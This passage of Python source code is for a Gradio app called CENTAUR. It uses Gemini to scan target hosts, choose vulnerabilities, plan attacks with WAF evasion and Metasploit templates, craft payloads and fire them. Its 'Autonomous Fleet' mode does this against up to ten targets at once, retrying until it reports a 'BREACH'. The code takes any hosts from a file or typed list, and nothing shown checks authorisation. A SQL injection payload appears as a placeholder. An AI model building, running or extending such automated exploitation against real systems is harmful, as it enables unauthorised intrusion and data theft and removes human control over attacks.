Return http_method as GET or POST based on the best attack approach """ try: config = types.GenerateContentConfig( response_mime_type="application/json", response_json_schema=CentaurChatResponse.model_json_schema() ) resp = await llm.aio.models.generate_content( model="gemini-2.5-flash", contents=context, config=config ) data = CentaurChatResponse.model_validate_json(resp.text) formatted_reply = f"**{data.chat_reply}**\n\n๐Ÿ“‹ Technical Analysis:\n{data.technical_analysis}" chat_history.append({"role": "user", "content": user_msg}) chat_history.append({"role": "assistant", "content": formatted_reply}) state["arsenal"][target_id].append({ "Timestamp": datetime.now().strftime("%H:%M:%S"), "Method": data.http_method, "Endpoint": data.suggested_endpoint, "Payload": data.suggested_payload, "Status": "๐Ÿค– AI Generated", "Notes": f"From: {user_msg[:50]}...", }) return (chat_history, data.suggested_endpoint, data.suggested_payload, data.suggested_code, data.http_method, state) except Exception as e: exploit_logger.log("ERROR", f"Chat agent failed: {e}") chat_history.append({"role": "user", "content": user_msg}) chat_history.append({"role": "assistant", "content": f"โš ๏ธ Agent Error: {str(e)}"}) return chat_history, current_ep, current_pl, current_code, http_method, state # ============================================================================== # AUTONOMOUS FLEET # ============================================================================== async def run_autonomous_fleet(selected, api_key, state): """Run autonomous fleet with fix loop integration""" if not api_key or not selected: return "๐Ÿ”ด Deployment Error: Select targets and provide API Key.", "", [] detailed_logs = [] async def attack_sequence(tid): p = state["profiles"][tid] log = [f"๐ŸŽฏ Target: {tid}", f"๐Ÿ“ก Recon: {len(p.discovered_paths)} paths, {len(p.api_endpoints)} APIs"] try: log.append("๐Ÿง  Phase 1: AI Vulnerability Analysis (with Google Search)...") analysis = await ai_analyze_target(p, 
api_key) if not analysis: return {"Target": tid, "Phase": "Analysis", "Status": "โŒ Failed", "Details": "AI analysis failed"} log.append(f" โ””โ”€ {analysis.vulnerability_type} ({analysis.confidence})") log.append(f" โ””โ”€ {analysis.reasoning[:100]}...") if analysis.related_cves: log.append(f" โ””โ”€ CVEs: {', '.join(analysis.related_cves[:3])}") log.append("๐ŸŽฎ Phase 2: Attack Strategy Generation...") strategy = await ai_generate_strategy(p, analysis, api_key) if not strategy: return {"Target": tid, "Phase": "Strategy", "Status": "โŒ Failed", "Details": "Strategy failed"} log.append(f" โ””โ”€ Attack: {strategy.vulnerability_class} via {strategy.http_method}") log.append(f" โ””โ”€ Endpoint: {strategy.target_endpoint}") log.append(f" โ””โ”€ Evasion: {', '.join(strategy.evasion_techniques[:3])}") if strategy.metasploit_template: log.append(f" โ””โ”€ Metasploit: {strategy.metasploit_template}") log.append("โš”๏ธ Phase 3: Payload Generation...") payload_gen = await ai_craft_payload(strategy, p, api_key) if not payload_gen: return {"Target": tid, "Phase": "Payload", "Status": "โŒ Failed", "Details": "Payload gen failed"} log.append(f" โ””โ”€ Payload: {payload_gen.payload[:80]}...") log.append(f" โ””โ”€ Encoding: {payload_gen.encoding}") log.append("๐Ÿ”„ Phase 4: Fix Loop Execution (up to 3 attempts)...") final_result, iterations = await fix_loop_execute(p, strategy, payload_gen, api_key) for iter_data in iterations: log.append(f" โ””โ”€ Attempt {iter_data['iteration']}: {iter_data['success'] and 'โœ… Success' or 'โŒ Failed'}") log.append(f" Evidence: {', '.join(iter_data['evidence'][:2])}") if final_result.success: log.append("๐ŸŽŠ Phase 5: Breach Confirmed!") log.append(f" โ””โ”€ Confirmed: {analysis.vulnerability_type}") log.append(f" โ””โ”€ Evidence: {', '.join(final_result.evidence[:3])}") state["arsenal"][tid].append({ "Timestamp": datetime.now().strftime("%H:%M:%S"), "Method": payload_gen.http_method, "Endpoint": strategy.target_endpoint, "Payload": 
payload_gen.payload, "Code": payload_gen.code_template, "Status": "โœ… BREACH CONFIRMED", "Notes": f"{analysis.vulnerability_type} | {', '.join(final_result.evidence[:2])} | {len(iterations)} attempts", }) detailed_logs.append("\n".join(log)) return { "Target": tid, "Vulnerability":analysis.vulnerability_type, "Confidence": analysis.confidence, "Method": payload_gen.http_method, "Payload": payload_gen.payload[:60] + "...", "Status": "โœ… BREACH" if final_result.success else "๐Ÿ”’ Blocked", "Evidence": ", ".join(final_result.evidence[:2]) if final_result.evidence else "None", "HTTP": final_result.status_code, "Attempts": len(iterations), } except Exception as e: exploit_logger.log("ERROR", f"Autonomous failed on {tid}: {e}") detailed_logs.append("\n".join(log) + f"\nโŒ Error: {str(e)}") return {"Target": tid, "Vulnerability": "Error", "Confidence": "N/A", "Method": "N/A", "Payload": "N/A", "Status": "โŒ Failed", "Evidence": str(e)[:50], "HTTP": 0, "Attempts": 0} results = await asyncio.gather(*[attack_sequence(t) for t in selected[:10]]) df = pd.DataFrame(results) success_count = len(df[df['Status'] == 'โœ… BREACH']) total = len(df) summary = f"""## ๐Ÿš€ Autonomous Fleet Report **Breaches:** {success_count}/{total} | **Success Rate:** {(success_count/total*100):.1f}% **Attack Distribution:** {df['Vulnerability'].value_counts().to_dict()} **Fix Loop Stats:** Avg attempts: {df['Attempts'].mean():.1f}""" html_table = df.to_html(classes='table', index=False, escape=False) return summary, html_table, detailed_logs # ============================================================================== # UI HELPER FUNCTIONS # ============================================================================== def get_payload_library_df(): rows = [] for vuln_type, categories in PAYLOAD_LIBRARY.items(): for category, payloads in categories.items(): for payload in payloads: rows.append({"Type": vuln_type, "Category": category, "Payload": payload}) return pd.DataFrame(rows) def 
filter_payloads(vuln_type_filter, search_term): df = get_payload_library_df() if vuln_type_filter and vuln_type_filter != "All": df = df[df["Type"] == vuln_type_filter] if search_term: df = df[df["Payload"].str.contains(search_term, case=False, na=False)] return df def get_db_dataframe(state, ip_filter="", port_filter="", vuln_only=False): profs = list(state.get("profiles", {}).values()) if not profs: return pd.DataFrame(columns=["target_id","protocol","server","waf","cms", "paths","errors","forms","apis","tech","Status"]) df = pd.DataFrame([p.to_dict() for p in profs]) df["Status"] = df.apply( lambda row: "โœ… Exploitable" if (row["paths"] > 0 or row["errors"] > 0) else "โšช Limited", axis=1 ) if ip_filter: df = df[df["target_id"].str.contains(ip_filter, case=False, na=False)] if port_filter: df = df[df["target_id"].str.endswith(f":{port_filter}")] if vuln_only: df = df[df["Status"] == "โœ… Exploitable"] return df async def run_recon_bg(files, manual, state): targets = [] if files: for f in files: try: with open(f.name, 'r') as csvf: for row in csv.reader(csvf): if row: host = row[0].strip() port = int(row[1]) if len(row) > 1 and row[1].strip().isdigit() else 80 targets.append((host, port)) except Exception: pass if manual: for line in manual.strip().split('\n'): line = line.strip().replace(' ', '') if not line or line.startswith('#'): continue if ':' in line: parts = line.split(':') host = parts[0] port = int(parts[1]) if parts[1].isdigit() else 80 else: host = line port = 80 targets.append((host, port)) if not targets: yield state, gr.update(choices=[]), gr.update(choices=[]), "โŒ No targets provided", pd.DataFrame() return exploit_logger.clear() exploit_logger.log("INFO", f"Starting reconnaissance on {len(targets)} targets") state["profiles"] = {} state["arsenal"] = defaultdict(list) sem = asyncio.Semaphore(MAX_CONCURRENT_RECON) async def scan_task(h, p): async with sem: return await AdvancedReconEngine(ReconProfile(h, p)).run() tasks = 
[asyncio.create_task(scan_task(h, p)) for h, p in list(set(targets))] total = len(tasks) for i, coro in enumerate(asyncio.as_completed(tasks), 1): p = await coro state["profiles"][p.target_id] = p exploitable = [k for k, v in state["profiles"].items() if v.is_exploitable] df = get_db_dataframe(state) progress = f"๐Ÿ” Scanning: {i}/{total} | Exploitable: {len(exploitable)}" yield state, gr.update(choices=exploitable), gr.update(choices=exploitable), progress, df final_exploitable = [k for k, v in state["profiles"].items() if v.is_exploitable] final_df = get_db_dataframe(state) final_msg = f"โœ… Recon Complete! Scanned {total}. Found {len(final_exploitable)} exploitable." exploit_logger.log("INFO", final_msg) yield state, gr.update(choices=final_exploitable), gr.update(choices=final_exploitable), final_msg, final_df def on_target_select(tid, state): if not tid or tid not in state["profiles"]: return ("Select a target from the dropdown...", pd.DataFrame(columns=["Timestamp","Method","Endpoint","Payload","Status","Notes"]), PAYLOAD_CODE_TEMPLATES["Custom"]) p = state["profiles"][tid] context = f"""## ๐ŸŽฏ Target Profile: `{tid}` **Infrastructure:** - Protocol: `{p.protocol.upper()}` | Server: `{p.server_banner}` | WAF: `{p.waf_detected}` | CMS: `{p.cms_detected}` - Technologies: `{', '.join(p.technologies) if p.technologies else 'Unknown'}` **Attack Surface:** - Paths: `{len(p.discovered_paths)}` โ†’ {', '.join(p.discovered_paths[:5])} - APIs: `{len(p.api_endpoints)}` โ†’ {', '.join(p.api_endpoints[:5])} - Forms: `{len(p.forms_found)}` | Errors: `{len(p.error_signatures)}` - Injectable Params: `{', '.join(p.injectable_params[:8])}` **Timing Baseline:** `{p.response_time_baseline:.3f}s` **Error Intelligence:** {chr(10).join(['- ' + sig for sig in p.error_signatures[:5]]) or '- None'} """ arsenal_data = state["arsenal"].get(tid, []) df = pd.DataFrame(arsenal_data) if arsenal_data else pd.DataFrame( columns=["Timestamp","Method","Endpoint","Payload","Status","Notes"]) 
return context, df, PAYLOAD_CODE_TEMPLATES["Custom"] async def execute_manual_wrap(tid, ep, pl, code, http_method, use_code, state): if not tid or tid not in state["profiles"]: return "โŒ Select a valid target first.", state, pd.DataFrame(), exploit_logger.format_logs() p = state["profiles"][tid] actual_payload = pl if use_code and code.strip(): derived = execute_code_template(code) if derived and not derived.startswith("# Code error"): actual_payload = derived exploit_logger.log("INFO", f"Using code-derived payload: {actual_payload[:80]}") exploit_logger.log("INFO", "Manual execution", { "target": tid, "method": http_method, "endpoint": ep, "payload_len": len(actual_payload) }) result = await advanced_payload_fire( p.protocol, p.host, p.port, ep, actual_payload, p.response_time_baseline, http_method=http_method ) status_icon = "โœ… SUCCESS" if result.success else "๐Ÿ”’ Blocked" evidence_str = " | ".join(result.evidence[:3]) if result.evidence else "No evidence" result_md = f"""### Execution Result **Status:** {status_icon} | **HTTP:** {result.status_code} | **Time:** {result.response_time:.2f}s **Evidence:** {evidence_str} **Response Snippet:** ``` {result.response_body[:500]} ``` **Extracted Data:** ``` {result.extracted_data[:400] if result.extracted_data else 'None'} ```""" state["arsenal"][tid].append({ "Timestamp": datetime.now().strftime("%H:%M:%S"), "Method": http_method, "Endpoint": ep, "Payload": actual_payload, "Code": code, "Status": status_icon, "Notes": evidence_str, }) return result_md, state, pd.DataFrame(state["arsenal"][tid]), exploit_logger.format_logs() def load_payload_template(template_name): return PAYLOAD_CODE_TEMPLATES.get(template_name, PAYLOAD_CODE_TEMPLATES["Custom"]) async def patch_code_with_ai(current_code, user_request, tid, state, api_key): if not tid or tid not in state["profiles"]: return current_code, "โŒ Select a target first" p = state["profiles"][tid] context = { "target": tid, "server": p.server_banner, "waf": 
p.waf_detected, "last_result": state["arsenal"].get(tid, [{}])[-1].get("Status", "N/A") if state["arsenal"].get(tid) else "N/A", } patch = await ai_patch_payload_code(current_code, user_request, context, api_key) if patch: changes = "\n".join(f"- {c}" for c in patch.changes_made) return patch.updated_code, f"**Changes:**\n{changes}\n\n**Explanation:**\n{patch.explanation}" return current_code, "โŒ Failed to patch code" # ============================================================================== # GRADIO UI (GRADIO 6 COMPATIBLE) # ============================================================================== _CSS = """ .primary-btn { background: linear-gradient(45deg,#ff0080,#ff8c00) !important; } .exploit-table { font-family: 'Courier New', monospace; font-size: 0.9em; } .code-editor { font-family: 'Courier New', monospace; font-size: 0.95em; } """ with gr.Blocks(css=_CSS, theme=gr.themes.Monochrome()) as demo: engine_state = gr.State({"profiles": {}, "arsenal": defaultdict(list)}) gr.Markdown("# โš”๏ธ CENTAUR โ€” Autonomous Penetration Testing Platform") gr.Markdown("### AI-Powered Web Application Security Assessment Framework (Gemini 2.5 + Fix Loop)") with gr.Row(): api_key = gr.Textbox( label="๐Ÿ”‘ Gemini API Key", type="password", placeholder="AIzaSy...", scale=3 ) gr.Markdown( "Get your key from [Google AI Studio](https://aistudio.google.com/app/apikey)" ) with gr.Tabs(): # ===== TAB 1: RECONNAISSANCE ===== with gr.Tab("๐Ÿ” 1. 
Reconnaissance"): with gr.Row(): with gr.Column(scale=1): gr.Markdown("### Target Input") csv_in = gr.File(label="๐Ÿ“ CSV Upload (host,port)", file_count="multiple") txt_in = gr.Textbox( label="โœ๏ธ Manual Entry (one per line)", placeholder="192.168.1.1:80\nexample.com:443\n10.0.0.1", lines=5 ) recon_btn = gr.Button("๐Ÿš€ START RECONNAISSANCE", variant="primary", size="lg") recon_status = gr.Markdown("โšช System Ready") with gr.Column(scale=2): gr.Markdown("### ๐Ÿ—„๏ธ Target Database") with gr.Row(): f_ip = gr.Textbox(label="๐Ÿ”Ž IP/Host Filter", placeholder="192.168", scale=2) f_port = gr.Textbox(label="Port Filter", placeholder="80", scale=1) f_v = gr.Checkbox(label="Exploitable Only", scale=1) db_viewer = gr.Dataframe(interactive=False, wrap=True, elem_classes="exploit-table") # ===== TAB 2: WAR ROOM ===== with gr.Tab("โš”๏ธ 2. War Room"): with gr.Row(): with gr.Column(scale=1): gr.Markdown("### ๐ŸŽฏ Target Selection") wr_target = gr.Dropdown(label="Active Target", choices=[], interactive=True) wr_context = gr.Markdown("*Select a target to view intelligence...*") gr.Markdown("### ๐Ÿ“š Arsenal History") arsenal_table = gr.Dataframe( headers=["Timestamp","Method","Endpoint","Payload","Status","Notes"], interactive=False, wrap=True, elem_classes="exploit-table" ) with gr.Column(scale=1): gr.Markdown("### ๐Ÿ› ๏ธ Payload Editor") with gr.Accordion("๐Ÿ“– Payload Library", open=False): with gr.Row(): lib_type = gr.Dropdown(label="Type", choices=["All"] + list(PAYLOAD_LIBRARY.keys()), value="All") lib_search = gr.Textbox(label="Search", placeholder="SLEEP") lib_table = gr.Dataframe(value=get_payload_library_df(), interactive=False, wrap=True) with gr.Accordion("๐Ÿ’ป Code Templates", open=False): template_select = gr.Dropdown(label="Load Template", choices=list(PAYLOAD_CODE_TEMPLATES.keys()), value="Custom") load_template_btn = gr.Button("Load Template") http_method_sel = gr.Radio( label="HTTP Method", choices=["GET","POST","PUT","DELETE"], value="GET" ) ep_in = 
gr.Textbox(label="๐ŸŽฏ Endpoint", placeholder="/api/users?id=", value="") pl_in = gr.Textbox(label="๐Ÿ’‰ Payload", placeholder="' OR SLEEP(5)--", value="", lines=3) gr.Markdown("### ๐Ÿ“ Payload Code (Editable & Executable)") code_editor = gr.Code( label="Python Code", language="python", value=PAYLOAD_CODE_TEMPLATES["Custom"], lines=15, elem_classes="code-editor" ) use_code_chk = gr.Checkbox( label="๐Ÿ”„ Execute code template to derive payload before firing", value=False ) with gr.Row(): fire_btn = gr.Button("๐Ÿ”ฅ EXECUTE PAYLOAD", variant="primary", size="lg") clear_btn = gr.Button("๐Ÿงน Clear", size="lg") fire_res = gr.Markdown() with gr.Accordion("๐Ÿ“Š Execution Logs", open=False): log_viewer = gr.Textbox(label="Detailed Logs", lines=10, max_lines=20, interactive=False) with gr.Column(scale=1): gr.Markdown("### ๐Ÿค– AI Agent โ€” CENTAUR") chatbot = gr.Chatbot( height=400, label="Conversational Interface", show_label=False, avatar_images=(None, "https://em-content.zobj.net/source/twitter/376/robot_1f916.png") ) chat_in = gr.Textbox( label="Operator Instruction", placeholder="The WAF blocked my SQLi. Help me bypass it with double URL encoding.", lines=2 ) with gr.Row(): chat_btn = gr.Button("๐Ÿ“ก Send to Agent", variant="primary") patch_code_btn = gr.Button("๐Ÿ”ง Patch Code with AI") patch_result = gr.Markdown() # ===== TAB 3: AUTONOMOUS FLEET ===== with gr.Tab("๐Ÿค– 3. 
Autonomous Fleet"): gr.Markdown("""### ๐Ÿš€ Multi-Target Autonomous Exploitation Deploy AI agents to: analyse vulnerabilities (with CVE search) โ†’ generate strategies (with Metasploit templates) โ†’ craft payloads โ†’ execute with fix loop (auto-retry up to 3x) โ†’ analyse results.""") fleet_select = gr.CheckboxGroup(label="๐ŸŽฏ Select Targets (max 10)", choices=[]) fleet_deploy = gr.Button("โšก DEPLOY AUTONOMOUS FLEET", variant="primary", size="lg") fleet_md = gr.Markdown() fleet_html = gr.HTML() with gr.Accordion("๐Ÿ“œ Detailed Attack Logs", open=False): fleet_logs = gr.JSON(label="Execution Logs") # ===== EVENT HANDLERS ===== recon_btn.click( run_recon_bg, inputs=[csv_in, txt_in, engine_state], outputs=[engine_state, wr_target, fleet_select, recon_status, db_viewer] ) for comp in [f_ip, f_port, f_v]: comp.change(get_db_dataframe, inputs=[engine_state, f_ip, f_port, f_v], outputs=db_viewer) wr_target.change( on_target_select, inputs=[wr_target, engine_state], outputs=[wr_context, arsenal_table, code_editor] ) lib_type.change(filter_payloads, inputs=[lib_type, lib_search], outputs=lib_table) lib_search.change(filter_payloads, inputs=[lib_type, lib_search], outputs=lib_table) load_template_btn.click(load_payload_template, inputs=[template_select], outputs=code_editor) arsenal_table.select( lambda tid, st, evt: ( st["arsenal"][tid][evt.index[0]].get("Endpoint", ""), st["arsenal"][tid][evt.index[0]].get("Payload", ""), st["arsenal"][tid][evt.index[0]].get("Code", "# No code available"), st["arsenal"][tid][evt.index[0]].get("Method", "GET"), ) if (tid in st["arsenal"] and evt.index and len(st["arsenal"][tid]) > evt.index[0]) else ("", "", "", "GET"), inputs=[wr_target, engine_state], outputs=[ep_in, pl_in, code_editor, http_method_sel] ) lib_table.select( lambda evt, df: df.iloc[evt.index[0]]["Payload"] if (evt.index and len(df) > evt.index[0]) else "", inputs=[lib_table], outputs=pl_in ) fire_btn.click( execute_manual_wrap, inputs=[wr_target, ep_in, pl_in, 
code_editor, http_method_sel, use_code_chk, engine_state], outputs=[fire_res, engine_state, arsenal_table, log_viewer] ) clear_btn.click( lambda: ("", "", PAYLOAD_CODE_TEMPLATES["Custom"], "GET"), outputs=[ep_in, pl_in, code_editor, http_method_sel] ) chat_btn.click( centaur_chat_agent, inputs=[chat_in, chatbot, wr_target, engine_state, ep_in, pl_in, code_editor, http_method_sel, api_key], outputs=[chatbot, ep_in, pl_in, code_editor, http_method_sel, engine_state] ).then( lambda tid, st: pd.DataFrame(st["arsenal"].get(tid, [])), inputs=[wr_target, engine_state], outputs=arsenal_table ).then(lambda: "", outputs=chat_in) patch_code_btn.click( patch_code_with_ai, inputs=[code_editor, chat_in, wr_target, engine_state, api_key], outputs=[code_editor, patch_result] ).then(lambda: "", outputs=chat_in) fleet_deploy.click( run_autonomous_fleet, inputs=[fleet_select, api_key, engine_state], outputs=[fleet_md, fleet_html, fleet_logs] ) if __name__ == "__main__": demo.launch(share=False, server_name="0.0.0.0", server_port=7860)